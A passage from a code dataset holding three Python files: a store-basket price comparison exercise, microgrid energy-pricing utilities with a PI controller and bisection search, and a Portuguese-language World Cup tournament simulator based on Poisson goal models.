number of missing items (Number of Nones)\n\n '''\n sum_price_list = sum(filter(None, price_list))\n missing_items = 0\n for i in price_list:\n if i == None:\n missing_items += 1\n\n return sum_price_list, missing_items\n\n\ndef get_attribute(store_db, ItemCode, tag):\n '''\n Returns the attribute (tag) \n of an Item with code: Itemcode in the given store\n\n '''\n try:\n return store_db[ItemCode][tag]\n except KeyError:\n return None\n\n\ndef string_item(item):\n '''\n Textual representation of an item in a store.\n Returns a string in the format of '[ItemCode] (ItemName)'\n\n '''\n try:\n return \"[{}]\\t{{{}}}\".format(item[ITEM_CODE_TAG], item[ITEM_NAME_TAG])\n except (KeyError ,TypeError):\n return None\n \n\ndef string_store_items(store_db):\n '''\n Textual representation of a store.\n Returns a string in the format of:\n string representation of item1\n string representation of item2\n '''\n str_out = \"\"\n for item in store_db:\n item_str = string_item(store_db[item])\n if item_str != None:\n str_out += item_str + \"\\n\"\n return str_out\n\n\ndef create_basket_from_txt(basket_txt): \n '''\n Receives text representation of few items (and maybe some garbage \n at the edges)\n Returns a basket- list of ItemCodes that were included in basket_txt\n\n '''\n # use RE to find the exac locations where a full product code\n # including the [] is found.\n expression = re.compile('\\[(\\d+)\\]')\n return expression.findall(str(basket_txt))\n\n\ndef get_basket_prices(store_db, basket):\n '''\n Arguments: a store - dictionary of dictionaries and a basket - \n a list of ItemCodes\n Go over all the items in the basket and create a new list \n that describes the prices of store items\n In case one of the items is not part of the store, \n its price will be None.\n\n '''\n float_lst = []\n for obj in basket:\n try:\n float_lst.append(float(store_db.get(obj).get(ITEM_PRICE_TAG)))\n except AttributeError:\n float_lst.append(None)\n\n return float_lst\n\n\ndef basket_item_name(stores_db_list, ItemCode):\n '''\n stores_db_list is a list of stores (list of dictionaries of\n dictionaries)\n Find the first store in the list that contains the item and return its\n string representation (as in string_item())\n If the item is not avaiable in any of the stores return only [ItemCode]\n\n '''\n for i in range(len(stores_db_list)):\n for key in stores_db_list[i]:\n if key == ItemCode:\n return string_item(stores_db_list[i][key])\n if i == len(stores_db_list) - 1:\n return '['+ItemCode+']'\n\n\ndef save_basket(basket, filename):\n '''\n Save the basket into a file\n The basket reresentation in the file will be in the following format:\n [ItemCode1]\n [ItemCode2]\n ...\n [ItemCodeN]\n '''\n str_to_file = ''\n for i in range(len(basket)):\n str_to_file += '['+str(basket[i])+']' + '\\n'\n\n file = open(filename, 'w')\n file.write(str_to_file)\n file.close()\n\n\ndef load_basket(filename):\n '''\n Create basket (list of ItemCodes) from the given file.\n The file is assumed to be in the format of:\n [ItemCode1]\n [ItemCode2]\n ...\n [ItemCodeN]\n '''\n basket = []\n file = open(filename, 'r')\n for line in file:\n basket.append(line[1: -2])\n file.close()\n return basket\n\n\ndef max_value(lst, idx):\n \"\"\"recieves a list of lists that contains numbers\n and nones and an index, returns the maximum value among\n all the lists (treats none as 0)\"\"\"\n max_val = 0\n for obj in lst:\n if obj[idx] != None and obj[idx]>max_val:\n max_val = obj[idx]\n return max_val\n\n\ndef best_basket(list_of_price_list):\n '''\n Arg: list of lists, where each inner list is list of prices as created\n by get_basket_prices.\n Returns the cheapest store (index of the cheapest list) given that a\n missing item has a price of its maximal price in the other stores *1.25\n\n '''\n sum_list = []\n for store in range(len(list_of_price_list)):\n sum_list.append(0)\n\n for store in range(len(list_of_price_list)):\n for price in range(len(list_of_price_list[store])):\n if list_of_price_list[store][price] == None:\n max_val = PUNISHMENT * max_value(list_of_price_list,price)\n sum_list[store] += max_val\n else:\n sum_list[store] += list_of_price_list[store][price]\n for i in range(len(sum_list)):\n if sum_list[i] == min(sum_list):\n return i\n","sub_path":"ex5/Integration/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536035802","text":"import math\nfrom scipy import special\nimport numpy as np\nfrom scipy.stats import poisson\nfrom collections.abc import Iterable\n\n# PI controller that takes as input kp, ki, current error and previous integral error\ndef PI(Kp, Ki, err, prev_i_err):\n i_err = prev_i_err + err\n u = Kp*err + Ki*i_err\n return u, i_err\n\n# Aggregate demand from agents assuming proportional control \ndef aggregate_demand(CR, mu, battery):\n demand = 0\n for a,b in zip(mu, battery):\n tmp = poisson.ppf(CR, 1*a) - b\n demand += max(0, tmp)\n return demand\n\n# Aggregate demand from agents assuming PI control\ndef aggregate_demand_PI(CR, mu, battery, i_err, Kp, Ki):\n demand = 0\n for a,b,c in zip(mu, battery, i_err):\n err = poisson.ppf(CR, 1*a) - b\n tmp, _ = PI(Kp, Ki, err, c)\n demand += max(0, tmp)\n return demand\n\n# Define Supply Curve approximation function\ndef supply_curve(Q, price, function='sigmoid'):\n supply = 0\n error = True\n if function == 'sigmoid':\n error = False\n supply = Q + special.logit(price)\n elif function == 'linear':\n error = False\n supply = Q * price\n elif function == 'quadratic':\n error = False\n supply = Q * (price ** 1/2)\n if error:\n print('Function Type not not specified')\n return supply\n\n# Bisection search to find intersection of demand and supply curves\ndef bisection_search(c, p, k, h, Q, mu, battery, i_err=0, Kp=1, Ki=0, sf='sigmoid', mode='basic'):\n tol = 1e-5\n if sf == 'sigmoid':\n lb = 1e-20\n ub = c - lb\n else: \n lb = 1e-20\n ub = 1e2\n iter_limit = 10000\n for _ in range(iter_limit):\n mp = (ub + lb)/2\n tmp = (p - mp + k)/(p - mp + k + (0.1*mp) + h)\n var1 = supply_curve(Q, mp, function=sf)\n if mode == 'basic':\n var2 = aggregate_demand(tmp, mu, battery)\n elif mode == 'PI':\n var2 = aggregate_demand_PI(tmp, mu, battery, i_err, Kp, Ki)\n var3 = var1 - var2\n if abs(var3) < 1 or (ub - lb)/2 < tol:\n #print('converged')\n break\n if var3 > 0:\n ub = mp\n else:\n lb = mp\n return mp\n\ndef crc(p, c, k, mu, n, battery, Q, i_err=0, Kp=1, Ki=0, gamma=1, h=0, capacity=1e2):\n z = np.zeros(n)\n a1 = np.zeros(n)\n new_i_err = np.zeros(n)\n space = capacity - battery\n\n cost = bisection_search(c, p, k, h, Q, mu, battery, i_err, Kp, Ki, sf='sigmoid', mode='PI')\n CR = (p - cost + k)/(p - cost + k + (0.1*cost) + h)\n\n for i in range(n):\n z[i] = min(poisson.ppf(CR, 1*mu[i]), capacity)\n err = poisson.ppf(CR, 1*mu[i]) - battery[i]\n u, new_i_err[i] = PI(Kp, Ki, err, i_err[i])\n u = max(0, u)\n a1[i] = min(u, space[i])\n return a1, z, cost, new_i_err\n\ndef basic_crc(p, c, k, mu, n, battery, Q, gamma=1, h=0, capacity=1e2):\n z = np.zeros(n)\n a1 = np.zeros(n)\n new_i_err = np.zeros(n)\n space = capacity - battery\n\n cost = bisection_search(c, p, k, h, Q, mu, battery, sf='sigmoid')\n #cost = cost/c\n CR = (p - cost + k)/(p - cost + k + (0.1*cost) + h)\n\n for i in range(n):\n z[i] = min(poisson.ppf(CR, 1*mu[i]), capacity)\n err = poisson.ppf(CR, 1*mu[i]) - battery[i]\n u = max(0, err)\n a1[i] = min(u, space[i])\n return a1, z, cost\n# Psuedo Reward v1 uses area under supply curve as effective cost and assumes ideal step function\ndef psuedo_reward_v1(p, c, k, Q, n, demands, batteries, actions):\n rewards = np.zeros(n)\n total_order_quantity = actions.sum(-1)\n excess = max(0, total_order_quantity - Q)\n for agent in range(n):\n demand = demands[agent]\n battery = batteries[agent]\n supplied = min(demand, battery) * p\n # Penalty for Inability to Supply Sufficient Energy from Battery\n mismatch = max(0, demand - battery) * k\n if total_order_quantity == 0:\n # Proportional Cost of Exceeding Renewable Supply\n proportion_of_excess = 0\n # Discharge of Battery modelled as a Holding Cost\n discharge = 0\n else:\n # Proportional Cost of Exceeding Renewable Supply\n proportion_of_excess = max(0, (excess/total_order_quantity)*actions[agent]) * c\n # Discharge of Battery modelled as a Holding Cost\n discharge = max(0, battery - demand) * 0.1 * c * (excess/total_order_quantity)\n reward = supplied - (mismatch+proportion_of_excess+discharge)\n if isinstance(reward, Iterable):\n reward = sum(reward)\n rewards[agent] = reward \n return rewards\n\n# Pseudo Reward v2 uses the cost price found using bisection search\ndef psuedo_reward_v2(p, c, k, Q, n, demands, batteries, actions):\n rewards = np.zeros(n)\n total_order_quantity = actions.sum(-1)\n excess = max(0, total_order_quantity - Q)\n for agent in range(n):\n demand = demands[agent]\n battery = batteries[agent]\n # Reward for Suplying Energy to User\n supplied = min(demand, battery) * p\n # Penalty for Inability to Supply Sufficient Energy from Battery\n mismatch = max(0, demand - battery) * k\n # Cost of Purchasing Energy\n cost = actions[agent]*c\n # Discharge Modelled as Holding Cost\n discharge = max(0, battery - demand) * 0.1 * c\n reward = supplied - (mismatch+cost+discharge)\n if isinstance(reward, Iterable):\n reward = sum(reward)\n rewards[agent] = reward\n return rewards\n","sub_path":"mgrid/util_crc.py","file_name":"util_crc.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405485970","text":"from math import e, sqrt\r\nfrom random import randint, shuffle\r\nfrom time import sleep, time\r\n\r\ndebug = False\r\nif debug:\r\n lightSpeed = True\r\nelse:\r\n while True:\r\n a = input(\"Qual modo deseja jogar? [COPA DO MUNDO] = 0 | [SIMULACOES] = 1\\n\")\r\n if a == '0' or a == '1':\r\n break\r\n else:\r\n print(\"Valor invalido! Tente novamente...\")\r\n a = int(a)\r\n lightSpeed = False\r\n if a:\r\n lightSpeed = True\r\ngols = 0\r\njogos = 0\r\n\r\nif debug:\r\n meta = [237, 196, 11, 53, 1150, 383, 16, 32, 1150, 99, 40, 20, 237, 805, 53, 40, 1788, 99, 53, 20, 80, 99, 16, 1610, 732, 473, 16, 11, 237, 32, 53, 158 ]\r\ntimes = ['URUGUAI', 'RUSSIA', 'ARABIA SAUDITA', 'EGITO', 'ESPANHA', 'PORTUGAL', 'IRAN', 'MARROCOS', 'FRANCA', 'DINAMARCA', 'PERU', 'AUSTRALIA', 'CROACIA', 'ARGENTINA', 'NIGERIA', 'ISLANDIA', 'BRASIL', 'SUICA', 'SERVIA', 'COSTA RICA', 'SUECIA', 'MEXICO', 'COREIA DO SUL', 'ALEMANHA', 'BELGICA', 'INGLATERRA', 'TUNISIA', 'PANAMA', 'COLOMBIA', 'JAPAO', 'SENEGAL', 'POLONIA' ]\r\npower = [1.4052, 1.3407, 0.7873, 0.9909, 2.2011, 1.577, 0.753, 0.8954, 2.17475, 1.1492, 0.99955,0.851, 1.4249, 1.9901, 1.042, 0.95, 2.5319, 1.1801, 1.0558, 0.8717, 1.1509, 1.1802, 0.8691, 2.41, 1.861, 1.65933, 0.785, 0.8011, 1.4091, 0.9028, 1.00367, 1.2681 ]\r\noffensiveness = [1.97, 1.86, 1.52, 1.1, 1.6, 1.72, 0.86, 1.07, 2, 1.68, 1.93, 1.41, 1.36, 1.67, 1.41, 1.01, 2.03, 2.18, 1.86, 1.49, 2.02, 1.6, 1.78, 2.14, 1.84, 1.22, 1.3, 2.22, 1.78, 1.18, 1.27, 1.67 ]\r\natk = []\r\ndefense = []\r\nfor i in range(len(times)):\r\n atk.append( sqrt( offensiveness[i] * power[i] ) )\r\n defense.append( sqrt( offensiveness[i]/(power[i]*1.0) ) )\r\n\r\n# 2.64 = media de gols por partida na copa do mundo de 2018\r\nmediaGolsSelecao = 2.64\r\natkMedio = 2 * sum(atk)/len(atk) * sum(atk)/len(atk) / mediaGolsSelecao\r\ndefenseMedio = 2 * sum(defense)/len(defense) * sum(defense)/len(defense) / mediaGolsSelecao\r\n\r\nfor i in range(len(times)):\r\n atk[i] = atk[i] / sqrt(atkMedio)\r\n defense[i] = defense[i] / sqrt(defenseMedio)\r\n #print(\"{:.2f} | {:.2f} ->\\t{}\".format(atk[i], defense[i], times[i]))\r\n\r\nvogal = [ 'o', 'a', 'a', 'o', 'a', 'a', 'o', 'o', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'o', 'a', 'a', 'a', 'a', 'a', 'o', 'a', 'o', 'o', 'a' ]\r\n\r\ngramaticaCampeao = []\r\nfor letra in vogal:\r\n if letra == 'a':\r\n gramaticaCampeao.append('')\r\n else:\r\n gramaticaCampeao.append('o')\r\n\r\nvezesCampeao = []\r\nfor num in times:\r\n vezesCampeao.append(0)\r\n\r\npontos = []\r\nfor i in times:\r\n pontos.append(0)\r\n\r\ngrupoA, grupoB, grupoC, grupoD, grupoE, grupoF, grupoG, grupoH, eliminatorias = [], [], [], [], [], [], [], [], []\r\ngrupos = [grupoA, grupoB, grupoC, grupoD, grupoE, grupoF, grupoG, grupoH]\r\nnomeGrupos = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\r\n\r\nfor i in range(0,len(times),4):\r\n grupos[i//4].append(times[i])\r\n grupos[i//4].append(times[i+1])\r\n grupos[i//4].append(times[i+2])\r\n grupos[i//4].append(times[i+3])\r\n \r\nwhile True:\r\n if lightSpeed:\r\n gameMode = 1\r\n break\r\n else:\r\n gameMode = input(\"Escolha modo de jogo: [PADRAO] = 0 | [TURBO] = 1\\n\")\r\n if gameMode == '0' or gameMode == '1':\r\n break\r\n else:\r\n print(\"Valor invalido! Tente novamente...\\n\")\r\ngameMode = int(gameMode)\r\n\r\ndef order_map(key, value, x = 2):\r\n if len(key) != len(value):\r\n return \"Error in length of key and value\"\r\n while x != 0 and x != 1:\r\n x = int(input(\"Ordem crescente -> 0 | decrescente -> 1:\\n\"))\r\n if (x > 1 or x < 0):\r\n print(\"Try again:\")\r\n ordenator = []\r\n copia = []\r\n for i in range(len(value)):\r\n copia.append(value[i])\r\n menor = value[0]\r\n for i in range(1,len(value)):\r\n if menor > value[i]:\r\n menor = value[i]\r\n for j in range(len(key)):\r\n maior = menor\r\n for i in range(len(value)):\r\n if maior <= value[i]:\r\n maior = value[i]\r\n index = i\r\n ordenator.append(index)\r\n value[index] = menor-1\r\n for i in range(len(copia)):\r\n value[i] = copia[i]\r\n k = []\r\n v = []\r\n for i in range(len(key)):\r\n k.append(key[ordenator[i]])\r\n v.append(value[ordenator[i]])\r\n for i in range(len(k)):\r\n if x == 0:\r\n key[i] = k[len(k)-i-1]\r\n value[i] = v[len(v)-i-1]\r\n else:\r\n key[i] = k[i]\r\n value[i] = v[i]\r\n\r\ndef fat(y):\r\n if y == 0:\r\n return 1\r\n num = 1\r\n dec = y\r\n while dec-1:\r\n num *= dec\r\n dec -= 1\r\n return num\r\n\r\ndef findIndex(x):\r\n for i in range(len(times)):\r\n if times[i] == x.upper():\r\n return i\r\n return -1\r\n\r\ndef findLambda(A, B, extraTime = False):\r\n indexA = findIndex(A)\r\n indexB = findIndex(B)\r\n lambdaA = atk[indexA] * defense[indexB]\r\n lambdaB = atk[indexB] * defense[indexA]\r\n if extraTime:\r\n lambdaA = lambdaA / 3.0\r\n lambdaB = lambdaB / 3.0\r\n else:\r\n if not lightSpeed:\r\n print(\"Resultado esperado: {} {:.2f} vs {:.2f} {}\".format(A, lambdaA, lambdaB, B))\r\n return lambdaA, lambdaB\r\n\r\ndef draftGoal(lista):\r\n newList = []\r\n for i in range(len(lista)):\r\n for j in range(int(lista[i])):\r\n newList.append(i)\r\n rnd = randint(0,len(newList)-1)\r\n return newList[rnd]\r\n\r\ndef poisson(A, B, extraTime = False):\r\n lambdaA, lambdaB = findLambda(A, B, extraTime)\r\n P1 = []\r\n P2 = []\r\n for i in range(9):\r\n result = (e**(-1*lambdaA) * lambdaA**i) / (fat(i)*1.0)\r\n P1.append(1000*result)\r\n result = (e**(-1*lambdaB) * lambdaB**i) / (fat(i)*1.0)\r\n P2.append(1000*result)\r\n golsA = draftGoal(P1)\r\n golsB = draftGoal(P2)\r\n return golsA, golsB\r\n\r\ndef match(A, B, knockOut = True, grupo = []):\r\n if not lightSpeed:\r\n print(\"\\n========================================================================================================================\\n\")\r\n print(\"\\nPARTIDA:\", A.upper(), \"x\", B.upper())\r\n print()\r\n if not gameMode:\r\n sleep(1.5)\r\n golsA, golsB = poisson(A, B)\r\n goalStamps = []\r\n sideScoring = []\r\n for i in range(golsA):\r\n sideScoring.append(0)\r\n for i in range(golsB):\r\n sideScoring.append(1)\r\n for i in range(golsA + golsB):\r\n while True:\r\n stamp = randint(1,90)\r\n if stamp not in goalStamps:\r\n goalStamps.append(stamp)\r\n break\r\n shuffle(sideScoring)\r\n count = 0\r\n placarA = 0\r\n placarB = 0\r\n for tempo in range(1, 91):\r\n if tempo in goalStamps:\r\n if sideScoring[count]:\r\n placarB += 1\r\n else:\r\n placarA += 1\r\n if not lightSpeed:\r\n goalEvent(A, B, sideScoring[count], placarA, placarB, tempo)\r\n count += 1\r\n else:\r\n if not lightSpeed:\r\n otherEvents(A, B, tempo)\r\n if not gameMode:\r\n sleep(0.1)\r\n if lightSpeed:\r\n global jogos, gols\r\n jogos += 1\r\n gols = gols + golsA + golsB\r\n if not knockOut:\r\n indexA = findIndex(A)\r\n indexB = findIndex(B)\r\n if golsA > golsB:\r\n pontos[indexA] = pontos[indexA] + 3 + 0.01*(golsA-golsB) + 0.0001*golsA\r\n pontos[indexB] = pontos[indexB] + 0.25 + 0.01*(golsB-golsA) + 0.0001*golsB\r\n elif golsB > golsA:\r\n pontos[indexB] = pontos[indexB] + 3 + 0.01*(golsB-golsA) + 0.0001*golsB\r\n pontos[indexA] = pontos[indexA] + 0.25 + 0.01*(golsA-golsB) + 0.0001*golsA\r\n else:\r\n pontos[indexA] = pontos[indexA] + 1 + 0.0001*golsA\r\n pontos[indexB] = pontos[indexB] + 1 + 0.0001*golsB\r\n\r\n else:\r\n if golsA > golsB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n elif golsB > golsA:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if not lightSpeed:\r\n print(\"FIM DO TEMPO REGULAMENTAR! VAMOS PARA A PRORROGACAO!\\n\")\r\n prorrogacao(A, B, placarA, placarB)\r\n \r\n if not lightSpeed:\r\n print(\"FINAL DE PARTIDA:\",A.upper(),golsA,'x',golsB,B.upper())\r\n if not knockOut:\r\n showTable(grupo)\r\n if not gameMode:\r\n input(\"\\nPartida terminada. Pressione ENTER para continuar...\")\r\n if not lightSpeed:\r\n print()\r\n\r\ndef prorrogacao(A, B, placarA, placarB):\r\n if not lightSpeed:\r\n print(\"PRORROGACAO!\\n\")\r\n if not gameMode:\r\n sleep(1.5)\r\n golsA, golsB = poisson(A, B, True)\r\n goalStamps = []\r\n sideScoring = []\r\n for i in range(golsA):\r\n sideScoring.append(0)\r\n for i in range(golsB):\r\n sideScoring.append(1)\r\n for i in range(golsA + golsB):\r\n while True:\r\n stamp = randint(91,120)\r\n if stamp not in goalStamps:\r\n goalStamps.append(stamp)\r\n break\r\n shuffle(sideScoring)\r\n count = 0\r\n for tempo in range(91, 121):\r\n if tempo in goalStamps:\r\n if sideScoring[count]:\r\n placarB += 1\r\n else:\r\n placarA += 1\r\n if not lightSpeed:\r\n goalEvent(A, B, sideScoring[count], placarA, placarB, tempo)\r\n count += 1\r\n else:\r\n if not lightSpeed:\r\n otherEvents(A, B, tempo)\r\n if not gameMode:\r\n sleep(0.1)\r\n if golsA > golsB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n elif golsB > golsA:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if not lightSpeed:\r\n print(\"FIM DA PRORROGACAO! O JOGO SERA DECIDIDO NOS PENALTIS! HAJA CORACAO!\\n\")\r\n penaltis(A, B)\r\n\r\ndef penaltis(A, B):\r\n vez = True\r\n placarPenaltiA = 0\r\n placarPenaltiB = 0\r\n contaCobrancas = 0\r\n while True:\r\n if vez:\r\n if cobraPenalti(A):\r\n placarPenaltiA += 1\r\n vez = False\r\n else:\r\n if cobraPenalti(B):\r\n placarPenaltiB += 1\r\n vez = True\r\n contaCobrancas += 1\r\n if (contaCobrancas >= 10 and vez and placarPenaltiA != placarPenaltiB) or ((contaCobrancas == 8 or contaCobrancas == 9) and abs(placarPenaltiA - placarPenaltiB) >= 2) or ((contaCobrancas == 6 or contaCobrancas == 7) and abs(placarPenaltiA - placarPenaltiB) >= 3):\r\n break\r\n if placarPenaltiA > placarPenaltiB:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(A)\r\n if not lightSpeed:\r\n print(A,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(A)\r\n if not lightSpeed:\r\n print(A,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n else:\r\n if len(eliminatorias) > 29:\r\n index = findIndex(B)\r\n if not lightSpeed:\r\n print(B,\"EH {} CAMPEA{} DA COPA DO MUNDO!\".format(vogal[index].upper(), gramaticaCampeao[index].upper()))\r\n else:\r\n vezesCampeao[index] += 1\r\n else:\r\n eliminatorias.append(B)\r\n if not lightSpeed:\r\n print(B,\"SE CLASSIFICOU PARA A PROXIMA FASE!\")\r\n\r\ndef cobraPenalti(time):\r\n if not lightSpeed:\r\n print(\"{} VAI COBRAR O PENALTI...\".format(time.upper()))\r\n if not gameMode:\r\n sleep(1)\r\n rnd = randint(1,10)\r\n if rnd < 4:\r\n if not lightSpeed:\r\n print(\"PERDEU!\\n\")\r\n return False\r\n if not lightSpeed:\r\n print(\"GOOOOL!\\n\")\r\n return True\r\n\r\ndef otherEvents(A, B, tempo):\r\n rnd = randint(0,1)\r\n if rnd:\r\n randomTeam = B.upper()\r\n index = findIndex(B)\r\n else:\r\n randomTeam = A.upper()\r\n index = findIndex(A)\r\n event = randint(1, 1350)\r\n if event == 1:\r\n print(\"Que situacao! Torcedor revoltado entra em campo pra protestar aos\", tempo, \"minutos, mas eh detido a tempo!\\n\")\r\n elif event < 4:\r\n print(\"Bandeirinha atento! {}\".format(vogal[index].upper()), randomTeam, \"ja ia marcando um gol aos\", tempo, \"minutos, mas o artilheiro tava na banheira.\\n\")\r\n elif event < 56:\r\n print(\"Falta pr{}\".format(vogal[index]), randomTeam, \"cobrar. Jogador adversario tomou o amarelo aos\", tempo, \"minutos de jogo.\\n\")\r\n elif event < 61:\r\n print(\"Expulso o defensor d{}\".format(vogal[index]), randomTeam, \"depois de uma falta dura aos\", tempo, \"minutos!\\n\")\r\n\r\ndef goalEvent(A, B, side, placarA, placarB, tempo):\r\n if not side:\r\n timeGol = A.upper()\r\n index = findIndex(A)\r\n else:\r\n timeGol = B.upper()\r\n index = findIndex(B)\r\n tipo = randint(0,100)\r\n if tipo == 0:\r\n print(\"Ih rapaz... O goleirao falhou! Entregou pr{}\".format(vogal[index]), timeGol, \"marcar aos\", tempo, \"minutos!\")\r\n elif tipo < 21:\r\n print(\"Gol de escanteio d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 41:\r\n print(\"Gol de cabeca d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 56:\r\n print(\"Golaco de longe d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 81:\r\n print(\"Golaco! Jogada trabalhada d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 91:\r\n print(\"Gol de puro talento em jogada individual d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n elif tipo < 96:\r\n print(\"Golaco de falta d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n else:\r\n print(\"Gol de penalti d{}\".format(vogal[index]), timeGol, \"aos\", tempo, \"minutos!\")\r\n print(A.upper(), placarA, \"x\", placarB, B.upper())\r\n print()\r\n\r\ndef showTable(grupo):\r\n try:\r\n indexInicial = findIndex(grupo[0])\r\n timesGrupo = [grupo[0], grupo[1], grupo[2], grupo[3]]\r\n pontosGrupo = [pontos[indexInicial], pontos[indexInicial+1], pontos[indexInicial+2], pontos[indexInicial+3]]\r\n order_map(timesGrupo, pontosGrupo, 1)\r\n if not lightSpeed:\r\n print()\r\n for i in range(4):\r\n print(\"{}: {:.0f} pts ->\\t{}\".format(i+1,pontosGrupo[i],timesGrupo[i]))\r\n except:\r\n pass\r\n\r\ndef avanco(grupo):\r\n indexInicial = findIndex(grupo[0])\r\n timesGrupo = [grupo[0], grupo[1], grupo[2], grupo[3]]\r\n pontosGrupo = [pontos[indexInicial], pontos[indexInicial+1], pontos[indexInicial+2], pontos[indexInicial+3]]\r\n order_map(timesGrupo, pontosGrupo, 1)\r\n eliminatorias.append(timesGrupo[0])\r\n eliminatorias.append(timesGrupo[1])\r\n if not lightSpeed:\r\n print(\"{} e {} avancaram pras oitavas de final!\".format(timesGrupo[0], timesGrupo[1]))\r\n if not gameMode:\r\n input(\"\\nPressione ENTER para continuar...\")\r\n if not lightSpeed:\r\n print()\r\n\r\ndef playGrupo(grupo):\r\n match(grupo[0], grupo[1], False, grupo)\r\n match(grupo[2], grupo[3], False, grupo)\r\n match(grupo[0], grupo[2], False, grupo)\r\n match(grupo[1], grupo[3], False, grupo)\r\n match(grupo[0], grupo[3], False, grupo)\r\n match(grupo[1], grupo[2], False, grupo)\r\n avanco(grupo)\r\n\r\ndef playOitavas(grupo):\r\n match(grupo[0], grupo[3])\r\n match(grupo[4], grupo[7])\r\n match(grupo[8], grupo[11])\r\n match(grupo[12], grupo[15])\r\n match(grupo[1], grupo[2])\r\n match(grupo[5], grupo[6])\r\n match(grupo[9], grupo[10])\r\n match(grupo[13], grupo[14])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA AS QUARTAS:\")\r\n for i in range(16,24):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playQuartas(grupo):\r\n match(grupo[16], grupo[17])\r\n match(grupo[18], grupo[19])\r\n match(grupo[20], grupo[21])\r\n match(grupo[22], grupo[23])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA A SEMI:\")\r\n for i in range(24,28):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playSemi(grupo):\r\n match(grupo[24], grupo[25])\r\n match(grupo[26], grupo[27])\r\n if not lightSpeed:\r\n print(\"AVANCAM PARA A GRANDE FINAL:\")\r\n for i in range(28,30):\r\n print(grupo[i])\r\n print(\"\\n\\n\\n\")\r\n\r\ndef playFinal(grupo):\r\n match(grupo[28], grupo[29])\r\n\r\nif lightSpeed:\r\n while True:\r\n numSimuls = input(\"Quantas simulacoes rodar? \")\r\n try:\r\n numSimuls = int(numSimuls)\r\n if numSimuls > 0:\r\n inicio = time()\r\n break\r\n else:\r\n print(\"Valor invalido! Tente novamente...\")\r\n except:\r\n print(\"Valor invalido! Tente novamente...\")\r\n \r\nelse:\r\n numSimuls = 1\r\n\r\nfor i in range(numSimuls):\r\n pontos = []\r\n for i in times:\r\n pontos.append(0)\r\n eliminatorias = []\r\n\r\n if not lightSpeed:\r\n print(\"Comeca a COPA DO MUNDO!\\n\")\r\n contaGrupo = 0\r\n for grupo in grupos:\r\n if not lightSpeed:\r\n print(\"\\nINICIO DO GRUPO {}!\\n\".format(nomeGrupos[contaGrupo]))\r\n playGrupo(grupo)\r\n contaGrupo += 1\r\n\r\n if not lightSpeed:\r\n print(\"\\nCOMECAM AS OITAVAS DE FINAL!\\n\")\r\n playOitavas(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECAM AS QUARTAS DE FINAL!\\n\")\r\n playQuartas(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECA A SEMI FINAL!\\n\")\r\n playSemi(eliminatorias)\r\n if not lightSpeed:\r\n print(\"\\nCOMECA A FINAL!\\n\")\r\n playFinal(eliminatorias)\r\n\r\nif lightSpeed:\r\n if debug:\r\n aux = vezesCampeao[:]\r\n order_map(meta, aux, 1)\r\n order_map(times, vezesCampeao, 1)\r\n print(\"Numero de Simulacoes realizadas: {}\\nTempo de execucao: {:.2f} segundos\".format(numSimuls, time() - inicio))\r\n print(\"Media de gols por jogo: {:.2f}\".format(gols/(jogos*1.0)))\r\n for i in range(len(times)):\r\n if debug:\r\n debugMessage = '\\t\\t[DEVERIA SER: ' + str(meta[i]*numSimuls/10000.0) + ']'\r\n else:\r\n debugMessage = ''\r\n print(\"{}:\\t{}x campeao ->\\t{} {}\".format(i+1, 